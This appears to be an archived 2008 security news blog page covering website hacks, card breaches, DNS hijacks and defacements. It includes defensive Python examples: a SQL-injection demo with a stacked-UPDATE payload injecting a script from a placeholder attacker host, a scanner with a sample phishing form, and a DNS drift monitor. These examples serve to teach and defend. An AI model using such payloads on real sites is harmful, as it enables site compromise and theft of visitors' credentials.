CyberInsecure.com

Daily cyber threats and internet security news alerts

Archive for the ‘Hacked’ Category

Sony USA PlayStation Website SQL Injected And Redirects Visitors To Fake Anti-Virus Scam

Wednesday, July 2nd, 2008

Sony’s USA PlayStation website, which has a very large number of daily visitors according to Alexa, has been the victim of an SQL injection attack. The PlayStation site is another high-traffic web site to fall victim to the continuing waves of mass SQL injection attacks driven by botnets (the ASProx botnet, for example).

The purpose of this wave of attacks seems to be to dupe users into installing the same fake anti-virus software SophosLabs discovered on .MOBI websites earlier this week. Numerous malicious websites using the unusual .MOBI top level domain attempted to load a script, ‘AD.JS’, located in the root of each site. This script in turn loaded another website, a fake anti-virus install site that pretends to run an online virus scan.

A bogus warning message was then displayed, claiming that one or more of the following had been detected:

Trojan.Bakloma.A
Win32.Gattman.A
Trojan.Zapchas.F
JS.Blackworm.A
Trojan.Tibs.E
Win32.Netsky.P@mm
Trojan.Winsys
Trackware.Adctech2006
Downloader.TrafficSector
Adware.Roings

If you have seen or installed this software on your PC, run a trusted anti-virus product as soon as possible, because your machine is infected.

After this, the user is encouraged to download and run an executable (installer.exe), which Sophos detects as Mal/Packer. If the installer is run, it installs further malicious files (detected as Troj/FakeAV-AA) on the victim’s machine.

Visiting the affected PlayStation site runs a script that pretends to perform the same online security scan of the visitor’s computer and presents the bogus warning message shown in the image above. Users frightened by the fake ‘warnings’ may rush to spend money on useless software.

The fact that the Sony PlayStation site could be attacked in this way suggests that someone with malicious intent could place other, more harmful malware there and infect a very large number of visitors.

The PlayStation site was not singled out by hackers; it was hit automatically, along with thousands of other pages that were SQL injected with the malicious coldwop.com domain (yet another mass SQL injection attack attributed to Chinese hackers). There are no reports that the PlayStation database or customers’ private details were compromised: the flaw in Sony’s website only allowed the injection of redirection code that loads a script from the malicious site.
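The mechanism behind this class of mass injection, as an added example that is not from the article, from Sony or from Sophos: a web application concatenates a URL parameter straight into SQL and runs it through a database API that accepts stacked statements, so one crafted request appends a script tag to every stored row and every page rendered from the table then serves it. The parameterized version beside it rejects the same input. The news table, its rows, the payload and the attacker.example domain are all constructed for the example; the real injected domain and script are the ones named in the article.

```python
import sqlite3

# Hypothetical script tag standing in for the redirect code the mass-injection
# campaigns appended to stored page content (the domain is a placeholder, not the real one).
INJECTED_TAG = '<script src="http://attacker.example/ad.js"></script>'

# Payload of the form the bots send in a URL parameter: a valid id, a statement
# terminator, then an UPDATE that appends the tag to every row's text column.
PAYLOAD = "1; UPDATE news SET body = body || '" + INJECTED_TAG + "'"


def make_db() -> sqlite3.Connection:
    """Constructed sample: a CMS-style table whose text columns are rendered into HTML."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    con.executemany(
        "INSERT INTO news (title, body) VALUES (?, ?)",
        [("Launch day", "<p>Welcome.</p>"), ("Patch notes", "<p>Fixes.</p>")],
    )
    con.commit()
    return con


def vulnerable_get_title(con: sqlite3.Connection, news_id: str) -> None:
    """Builds the query by string concatenation and hands it to an API that
    accepts stacked statements (executescript), mirroring database drivers
    where 'id=1; UPDATE ...' runs as two statements. Everything after the ';'
    in news_id executes with the application's database privileges."""
    sql = "SELECT title FROM news WHERE id = " + news_id + ";"
    con.executescript(sql)


def safe_get_title(con: sqlite3.Connection, news_id: str):
    """Validates the input type and binds it as a parameter, so the value can
    never be parsed as SQL. Non-numeric input is rejected outright."""
    try:
        ident = int(news_id)
    except ValueError:
        raise ValueError("news_id must be an integer") from None
    row = con.execute("SELECT title FROM news WHERE id = ?", (ident,)).fetchone()
    return row[0] if row else None


def tainted_rows(con: sqlite3.Connection) -> int:
    """How many stored bodies now carry a script tag (what every rendered page would serve)."""
    return sum(1 for (body,) in con.execute("SELECT body FROM news") if "<script" in body.lower())


if __name__ == "__main__":
    con = make_db()
    vulnerable_get_title(con, PAYLOAD)
    print("rows carrying injected script after vulnerable query:", tainted_rows(con))

    con = make_db()
    try:
        safe_get_title(con, PAYLOAD)
    except ValueError as exc:
        print("safe query rejected payload:", exc)
    print("rows carrying injected script after safe query:", tainted_rows(con))
```

The point of the example is that the injected statement touches data, not the schema: nothing is “stolen”, every visitor of every page simply receives the attacker’s script. That is consistent with the article’s note that the database was not reported breached, and it is why the fix is parameter binding plus input typing rather than a firewall.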

Hackers Selling Stolen Credit Cards Expose Breach At Montgomery Ward Parent Company

Saturday, June 28th, 2008

At least 51,000 records were exposed in the breach at the parent company of Montgomery Ward. The venerable Wards chain that began in 1872 went out of business in 2001, but in 2004 a catalog company, Direct Marketing Services Inc., bought the brand name out of bankruptcy. It now runs a Wards.com Web site along with six other sites, including three with Sears brands it has acquired: SearsHomeCenter.com, SearsShowplace.com and SearsRoomforKids.com.

The financial company Citigroup detected the intrusion in December. By going through HomeVisions.com, another Direct Marketing Services site, the hackers had plundered the database that holds account information for all the company’s retail properties.

Online chatter was detected in June by Affinion Group Inc.’s CardCops, a group of investigators who track payment-card theft for financial institutions. In Internet chat rooms frequented by card thieves, CardCops spotted hackers touting the sale of 200,000 payment cards belonging to one merchant. CardCops then intercepted several hundred of the records, along with the online handles of hackers whose real names remain unknown.

Along with the card numbers, their three-digit “security codes” and expiration dates, the thieves had the cardholders’ names, addresses and phone numbers. The data had been organized in the same way across records, indicating the numbers likely came from the same database. The vast majority of the cardholders were women, a clue that the records came from a merchant catering to a particular demographic. The presence of the three-digit codes is itself notable: the card brands’ PCI DSS rules prohibit merchants from storing that value once a transaction has been authorized.

When cardholders were contacted, the first eight said they had bought things online or through mail order from Montgomery Ward. Further investigation showed a high probability that the entire Montgomery Ward database was breached.

Direct Marketing Services immediately informed its payment processor, Visa and MasterCard, and closely followed a set of guidelines issued by Visa on how to respond to a security breach, including a report to the U.S. Secret Service. Those guidelines from Visa are largely technical and only require hacked organizations to inform the financial industry, not the affected consumers. Consumer notification is instead a matter of state law: depending on the state, companies that fail to notify can be fined or sued by affected customers.

As a result, scores of breaches covering hundreds of millions of consumer accounts have been disclosed by banks, universities, corporations and retailers in recent years. Direct Marketing Services now plans to contact affected consumers.

It is not clear whether the hackers were inflating their claim when they offered 200,000 records or whether the official number of 51,000 is accurate.

Hackers Hijack ICANN And IANA’s Domains

Friday, June 27th, 2008

The official domains of ICANN, the Internet Corporation for Assigned Names and Numbers, and IANA, the Internet Assigned Numbers Authority, were hijacked earlier today by the Turkish hacking group NetDevilz, which also hijacked Photobucket’s domain on the 18th of June.

The hijacked domains are icann.net, icann.com, iana-servers.com, internetassignednumbersauthority.com and iana.com.
ICANN is responsible for the global coordination of the Internet’s system of unique identifiers. These include domain names, as well as the addresses used in a variety of Internet protocols. The Internet Assigned Numbers Authority (IANA) is responsible for the global coordination of the DNS Root, IP addressing, and other Internet protocol resources.

NetDevilz left the following message on all of the domains :

You think that you control the domains but you don’t! Everybody knows wrong. We control the domains including ICANN! Don’t you believe us? haha :) (Lovable Turkish hackers group)

The hackers again redirected visitors to Atspace.com (82.197.131.106), a free hosting service; Atspace was also used during the Photobucket DNS hijacking. Since NetDevilz declined to reveal how they did it, many suspect a cross-site scripting or cross-site request forgery vulnerability was the method used to hijack the domains.

Terrorist And Leftist Websites Defaced By Israeli Hackers

Thursday, June 26th, 2008

An Israeli hacking group broke into the site of Izz al-Din al-Qassam, the military wing of Hamas, and the sites of some leftist movements. The hacked websites were defaced and their previous content replaced with the words of the Israeli national anthem. Currently the Izz al-Din al-Qassam website displays a white screen with words in Arabic announcing technical difficulties.

The hacker group, which calls itself Fanat al-Radical (the fanatical radicals), also said that it broke into the sites of additional terror organizations and various leftist movements. According to an unnamed representative of the group, they searched for relevant sites, whether leftist or anti-Zionist, and looked for loopholes. The group consists of young adults aged 16 to 18.

In addition to the Hamas military wing’s site, they also broke into the site of the Balad political party (http://arabs48.com/balad), that of Hagada Hasmalit (the Left Bank, http://www.hagada.org.il), the Kibush (Occupation, kibush.co.il) site and more. The Left Bank site, which the group considers another site identifying with the left, was defaced “due to its blatant anti-Zionist contents”. The hacked sites now carry an Israeli flag, the words of the Israeli national anthem “Hatikva” with vowel marks, and pictures of Palestinian babies and children dressed as suicide bombers, along with a short explanation of why each site was broken into.

Fanat al-Radical is a new group whose members previously belonged to another group called Kamikaz Team. According to them, since they did not want to bring politics into Kamikaz, a parallel group that supports the destruction of Arab sites was created. The group considers its first hacking campaign a success and does not intend to stop here; it says it plans a further attack in the future.

Photobucket DNS Records Hijacked By A Hacking Group

Wednesday, June 18th, 2008

Photobucket, a very popular photo sharing site, had its DNS records hijacked yesterday by a Turkish hacking group known for its defacement of the adult video site Redtube earlier this year.

Photobucket users across the world reported outages of the service and problems logging in to their accounts. A very similar incident happened to the DNS records of Comcast.net, which redirected users to a third-party domain a few weeks ago.

The hacking group left a message that appears to have been loaded from a third-party free hosting domain, atspace.com. This web hosting service belongs to Zetta Hosting Solutions, and Photobucket users whose resolvers still cache the hijacked DNS entries are still being redirected to a default hosting ad page within atspace.com. There are no reports of malware infections or stolen accounts as a result of this incident.

Photobucket does not appear to have acknowledged that the service suffered a DNS hijack. It said nothing on its blog or website, and when users started discussing the incident on Photobucket’s own support forums, a Photobucket Forum Support representative described it only as roughly an hour of downtime caused by changed DNS entries:

On Tuesday afternoon, some users that typed in the Photobucket.com URL were temporarily redirected to an incorrect page due to an error in our DNS hosting services. The error was fixed within an hour of its discovery, but due to the nature of the problem, some users will not have access to Photobucket for a few hours as the fix rolls out. It is important to note that only a portion of Photobucket users encountered the problem and that no Photobucket content, password information or other personal information was affected by the redirect.

DivShare Online Storage Breached, Basic Members Data Accessed By Hacker

Tuesday, June 17th, 2008

DivShare, an online service for storing and sharing video, photos, music and documents, has had a security breach. The company announced on its blog tonight that a malicious user had accessed its database, which included user e-mail addresses and other basic profile information.

DivShare is an online file-sharing service with more than half a million members. It is free to sign up for, gives members 5GB of storage and it is possible to download 50GB of data from the service per month.

DivShare members have been warned regarding this security breach by an email from the service. DivShare temporarily took all members’ files offline and implemented a new security system, though full access to the files has now been restored, the company said.

“No financial information has been accessed by any unauthorized parties. We have taken extreme measures to secure the site in the last 12 hours and are currently in the process of rolling out new security precautions,” the statement said. It also says that the company apologizes for allowing this breach to take place and takes every precaution available to ensure that this doesn’t happen again.

While it is good that DivShare provides information about its security breach, it may be hard to trust a company that allowed personal information to be accessed by hackers. Although the issue was quickly resolved, the data that was copied remains in the attackers’ hands, which is probably why DivShare recommends that all users change their account password and the passwords on any private folders as a security precaution.

According to an update on the DivShare website at 8:30 PM ET, all files are now back online after outages caused by security upgrades. Concerned DivShare members can contact support with any questions.

Possible Theft Of Customers’ Credit Cards In Compromised Altman Weil Online Store

Monday, June 16th, 2008

The Altman Weil online store was compromised by a virus that may have exposed the credit card information of certain store customers. The compromise was discovered on May 16, 2008 by the company that hosts the online store website. The hosting company is not named in the official Maryland State Attorney General breach notification, but the current host of the Altman Weil online store appears to be mindSHIFT.

Upon learning of the breach, on that same day, Altman Weil immediately authorized the hosting company to shut the site down so that access was no longer possible. Altman Weil states that the hosting company has preserved logs and electronic evidence, has logged all actions taken, and has not altered or compromised the systems.

According to the hosting company, the server on which the online store was located was password protected and had current firewalls and security protection, but what the company calls an “SQL virus” may nonetheless have accessed credit card information. The notification gives no further technical detail; note that password protection and a firewall do nothing against an attack that arrives through the web application itself, which is what the name suggests.

This attack is currently under investigation in order to fully determine the extent to which credit card information of customers may have been accessed.

Altman Weil notified all card holders by letter of the situation and the possible risk. On May 23, 2008 it notified the police department in Newtown Square, Pennsylvania, where Altman Weil is located. Also contacted: the Secret Service’s ECTF and Electronic Crimes Working Group, every state Attorney General in the states where potentially affected cardholders reside, the Federal Trade Commission, the Office of Thrift Supervision, the Office of the Comptroller of the Currency, the Federal Deposit Insurance Corporation and the Board of Governors of the Federal Reserve System.

For more information, Joann Miller at Altman Weil, Inc. can be contacted at 610-886-2006, or via email at: jamiller<at>altmanweil.com.

Cotton Traders Clothing Firm Customers Credit Card Details Stolen From Hacked Website

Tuesday, June 10th, 2008

The Cotton Traders clothing firm’s website was hacked earlier this year and the credit card details of up to 38,000 customers were stolen by unidentified attackers. Customer addresses were also taken. The firm has not yet released full details of the breach.

In a statement to BBC News, Cotton Traders said all of its customers’ credit card data was encrypted on the website. The firm brought in industry security experts to resolve the problem and has recently upgraded all security on its website, which has been validated by leading industry experts. It added: “We would like to reassure all our customers that their data is secure and that the Cotton Traders website meets all leading Industry security standards.” Encryption of stored card data is of limited comfort if the web application that decrypts it was itself the point of compromise, and the statement does not say how the data was taken.

The exact method used to hack the Cotton Traders website is unknown. The firm has said customers worried about their cards should contact their card provider.

Credit Cards Data Stolen In 1st Source Bank Intrusion

Thursday, June 5th, 2008

Hackers broke into the systems of South Bend, Ind.-based 1st Source Bank from the outside and compromised a server containing debit card data. The bank is reissuing its entire portfolio of debit cards, probably tens of thousands of them.

The $4.5-billion-asset bank, with 79 branches in northern Indiana and southern Michigan, began alerting customers last month after an outside monitoring service it uses noticed, on May 12, an unusual flow of data from a bank server containing debit card data. The server was immediately shut down. The bank notified law-enforcement authorities and hired outside forensic firms to analyze the breach.

It is unclear what percentage of card holders is affected. The hackers obtained Track 2 data from the cards’ magnetic stripes, including account numbers and, in at least some cases, PINs. Track 2 itself carries the account number, expiry date and a verification value rather than the cleartext PIN, so any PIN exposure implies the server also held PIN data of some form. How the hackers tapped the server has not been released to the public.

1st Source Bank is sending out letters reminding customers to check their recent account activity. Out of an abundance of caution, the bank is reissuing new MasterCard-branded debit cards to all customers. 1st Source is also offering customers free credit-report monitoring for a year and called in a forensic computer specialist team from the Washington, D.C., area to shut down the breach immediately and help determine who was behind it.

Bank officials have yet to tally the cost of mailings to customers, creating new debit cards, consultants’ fees, paying for identity theft protection and employee overtime related to the security breach.

So far no fraud has been discovered as a result of the intrusion.

UK Home Office Crime Reduction Website Hosted Italian Phishing Scam

Tuesday, June 3rd, 2008

The UK Home Office crime reduction website (crimereduction.homeoffice.gov.uk) was hacked on Monday. The attackers used the compromised site to host an Italian phishing page. A remote file inclusion exploit was used to serve the phishing page from the web server hosting the Crime Reduction site under homeoffice.gov.uk. As a result, a page resembling the www.poste.it site was served up so that it appeared to come from the homeoffice.gov.uk domain. Poste.it is the website of an Italian bank and is a frequent target of phishing attacks.

According to a net security firm, the phishing fraudsters used the POST method so that data submitted by victims was sent straight to them. It is unclear why they picked a UK government page to host a phishing attack, though a page on a trusted government domain is less likely to be blocked by reputation-based filters. Usually phishers pick or register a domain name that looks as much as possible like the original website’s, to confuse victims.

The Home Office pulled the rogue content from its site early on Monday morning. This attack is another example of cybercriminals abusing security flaws on trusted websites to serve up fraudulent content such as phishing pages or to install malware. The Home Office crime reduction website joins a long list of other UK government sites, and the US Department of Homeland Security website, that have been abused by attackers in recent months. That this time it is a crime reduction website should be extra embarrassing for the British government department.
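Both the Sony injection above and this Home Office phishing page leave the same trace in the served HTML: a reference that points off the site’s own hosts, a script src loaded from the injected domain in one case and a form whose action posts victims’ credentials to the fraudsters’ server in the other. The scanner below, an added example that is not from the article or from any firm it names, walks a page and reports every script, iframe or form that points at a host outside an allow-list; a site owner can run it against their own pages on a schedule. The three sample pages and the hostnames in them are constructed, not the real injected or phishing content.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class OffSiteRefFinder(HTMLParser):
    """Collects script/iframe sources and form actions whose host is not one of
    the site's own allowed hosts. Relative URLs carry no host and are ignored."""

    WATCHED = {"script": "src", "iframe": "src", "form": "action"}

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed = {h.lower() for h in allowed_hosts}
        self.findings = []  # (tag, host, url, form method or None)

    def handle_starttag(self, tag, attrs):
        attr_name = self.WATCHED.get(tag)
        if attr_name is None:
            return
        attrs = dict(attrs)  # HTMLParser lowercases tag and attribute names
        url = (attrs.get(attr_name) or "").strip()
        host = urlparse(url).hostname  # also handles protocol-relative //host/path
        if host and host.lower() not in self.allowed:
            method = (attrs.get("method") or "get").lower() if tag == "form" else None
            self.findings.append((tag, host.lower(), url, method))


def find_offsite_refs(html: str, allowed_hosts):
    """Return every off-site script/iframe source and form action found in html."""
    parser = OffSiteRefFinder(allowed_hosts)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed samples (hostnames are placeholders).
ALLOWED = {"www.site.example", "static.site.example"}

INJECTED_PAGE = """<html><body>
<h1>News</h1><p>Launch day</p><script src="http://attacker.example/ad.js"></script>
<script src="/js/site.js"></script>
</body></html>"""

PHISH_PAGE = """<html><body>
<img src="/img/logo.gif"><form method="POST" action="http://drop.example/collect.php">
<input name="user"><input name="pass" type="password"><input type="submit"></form>
</body></html>"""

CLEAN_PAGE = """<html><body><script src="//static.site.example/app.js"></script>
<form action="/login" method="post"><input name="u"></form></body></html>"""


if __name__ == "__main__":
    for name, page in [("injected", INJECTED_PAGE), ("phish", PHISH_PAGE), ("clean", CLEAN_PAGE)]:
        for tag, host, url, method in find_offsite_refs(page, ALLOWED):
            extra = f" (method {method})" if method else ""
            print(f"{name}: off-site <{tag}> -> {host}{extra}: {url}")
```

Keep the allow-list explicit and small: a CDN or analytics host you legitimately use goes in it, everything else is a finding to look at. A POST form pointing off-site is the phishing signature the security firm quoted above described; an off-site script on a page that should have none is the mass-injection signature.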

Phoenix Mars Lander Website Defaced By Script Kiddies

Monday, June 2nd, 2008

Security staff had to take down the University of Arizona-hosted site after script kiddies replaced the lead blog entry with the message “hacked by VITAL.” The hackers also redirected visitors of the Phoenix mission’s official web page and a companion site to a third-party destination, a page that gave credit to hackers going by the names BLaSTER and Cr@zy_king.

A spokeswoman for the Phoenix Mars Lander mission says a hacker took over the mission’s public website and replaced its lead news story with a hacker’s signature and a link redirecting visitors to an overseas website. The site, hosted by the University of Arizona, has been taken offline while computer experts work to correct the problem.

Over the past few months, millions of websites, some belonging to the US Department of Homeland Security, the United Nations and the UK Civil Service, have been hit by similar exploits. The attacks are not the result of vulnerabilities in the database or web server software supplied by Microsoft, Apache and others, but of flaws in the custom-made web applications running on top of them.

There are no reports that redirected visitors in this latest episode were exposed to links that attempted to silently install malware on their machines. The Phoenix Mars Lander mission’s security staff have already fixed the defacement.

Hacked Comcast.net Leaves Users Without Email Access

Thursday, May 29th, 2008

Comcast.net, the portal of US communications provider Comcast, was hacked on Wednesday night. As a result of the attack, Comcast subscribers were unable to access their email or other services through the portal for more than two hours. Comcast is the second biggest ISP in the US and a major provider of cable TV services.

The comcast.net front page was replaced by a greeting from the hackers on May 28. The defacement was removed after more than two hours, after which users were confronted by a “page under construction” message before the site was restored in the early hours of Thursday morning; the site remained intermittently unavailable even after that. The exact mechanism of the attack is still unclear, though an injected iframe that served up content from sites under the hackers’ control is suspected. Some form of DNS redirection attack may also have been involved.

Normally, defacement attacks simply involve a text message or an image on a website. In the case of the Comcast attack, however, some attempt may have been made to snoop on users’ login credentials.

There is still a lot of speculation about the details of this attack and why it happened. The defacement was claimed by two hackers who left the following message on a blank white page at Comcast.net: “KRYOGENIKS Defiant and EBK RoXed COMCAST sHouTz To VIRUS Warlock elul21 coll1er seven”.

Update: Not only did the hackers hijack Comcast’s domain name for three hours overnight, they also sent subscribers who tried to access webmail and other services to a rogue site that bragged of the exploit.

Comcast lost control of the comcast.net address after the attackers changed registration information stored by its domain registrar, Network Solutions. The unauthorized change redirected people attempting to visit the site to a page that read: “KRYOGENIKS Defiant and EBK RoXed COMCAST. sHouTz To VIRUS Warlock elul21 coll1er seven.” The page was displayed after the attackers altered the site’s IP resolution information, replacing Comcast’s IP address with the rogue address 209.62.20.186. In addition to their cryptic defacement, they altered the address for Comcast’s administrative contact to “69 dick tard lane, dildo room.”

Comcast said there was no immediate evidence that the attackers’ page tried to install malware or steal user credentials, but some reports claimed that email clients were redirected to the impostor address, which requested users’ login name and password.

It is still unclear how the attackers accessed the registration settings stored with Network Solutions. A Network Solutions spokeswoman said the company is working with Comcast to figure out how the hackers obtained the login credentials to the account. Comcast is also working with unnamed law enforcement agencies to track down the attackers. Whatever the mechanism, the registrar account was the single point of failure: with its credentials, an attacker can repoint a domain without touching any of the owner’s own servers.
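The ICANN/IANA, Photobucket and Comcast incidents above share one shape: nothing on the victims’ servers changed, the domain’s records at the registrar did, and in Comcast’s case the administrative contact was rewritten as well. Since a registrar compromise is invisible from inside the network, the practical control is an out-of-band monitor that pins the known-good A records, NS delegation and whois contact and alarms on any deviation. The script below is an added example, not Comcast’s, Photobucket’s or ICANN’s own tooling; the baseline, the site.example names and the whois text are constructed, and the only value taken from the reporting is the rogue address 209.62.20.186. Live mode calls the standard dig and whois commands, whose whois output format varies by registrar, so the field names may need adjusting.

```python
import subprocess
import sys

# Known-good values an operator records when the domain is set up (constructed).
BASELINE = {
    "a": {"203.0.113.10"},
    "ns": {"ns1.site.example.", "ns2.site.example."},
    "admin_email": "hostmaster@site.example",
}

# Constructed observations modelled on the Comcast report: the A record now points
# at the rogue address, and the delegation and admin contact were changed at the registrar.
OBSERVED_DIG_A = "209.62.20.186\n"
OBSERVED_DIG_NS = "ns1.free-host.example.\nns2.free-host.example.\n"
OBSERVED_WHOIS = """Domain Name: SITE.EXAMPLE
Registrar: Example Registrar, Inc.
Name Server: NS1.FREE-HOST.EXAMPLE
Name Server: NS2.FREE-HOST.EXAMPLE
Admin Email: hijacker@mailbox.example
"""


def parse_dig_short(text: str) -> set:
    """Turn `dig +short` output (one value per line) into a normalized set."""
    return {line.strip().lower() for line in text.splitlines() if line.strip()}


def parse_whois(text: str) -> dict:
    """Collect 'Field: value' whois lines into lowercased field -> list of values."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and value.strip():
            fields.setdefault(key.strip().lower(), []).append(value.strip().lower())
    return fields


def detect_drift(baseline: dict, dig_a: str, dig_ns: str, whois_text: str) -> list:
    """Return (check, expected, observed) for every value that differs from the baseline."""
    alerts = []
    a_records = parse_dig_short(dig_a)
    if a_records != baseline["a"]:
        alerts.append(("A", sorted(baseline["a"]), sorted(a_records)))
    ns_records = parse_dig_short(dig_ns)
    if ns_records != baseline["ns"]:
        alerts.append(("NS", sorted(baseline["ns"]), sorted(ns_records)))
    who = parse_whois(whois_text)
    admin = who.get("admin email", [None])[0]
    if admin != baseline["admin_email"]:
        alerts.append(("whois admin email", baseline["admin_email"], admin))
    # Registrar-side delegation, compared separately from what DNS currently answers.
    whois_ns = {v.rstrip(".") + "." for v in who.get("name server", [])}
    if whois_ns and whois_ns != baseline["ns"]:
        alerts.append(("whois NS", sorted(baseline["ns"]), sorted(whois_ns)))
    return alerts


def run(cmd: list) -> str:
    """Run an external command and return its stdout (live mode only)."""
    return subprocess.run(cmd, capture_output=True, text=True, check=False).stdout


if __name__ == "__main__":
    if len(sys.argv) > 1:  # live: python dnsdrift.py yourdomain.example (needs dig and whois)
        domain = sys.argv[1]
        alerts = detect_drift(BASELINE, run(["dig", "+short", "A", domain]),
                              run(["dig", "+short", "NS", domain]), run(["whois", domain]))
    else:  # offline demo on the constructed observations
        alerts = detect_drift(BASELINE, OBSERVED_DIG_A, OBSERVED_DIG_NS, OBSERVED_WHOIS)
    for check, expected, observed in alerts:
        print(f"ALERT {check}: expected {expected}, observed {observed}")
    if not alerts:
        print("no drift from baseline")
```

Run it from a host outside your own network, against a resolver you do not control, so that it sees what the public sees; the Photobucket support reply above shows why, since the operator’s own view of “fixed within an hour” did not match what cached resolvers kept serving to users.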
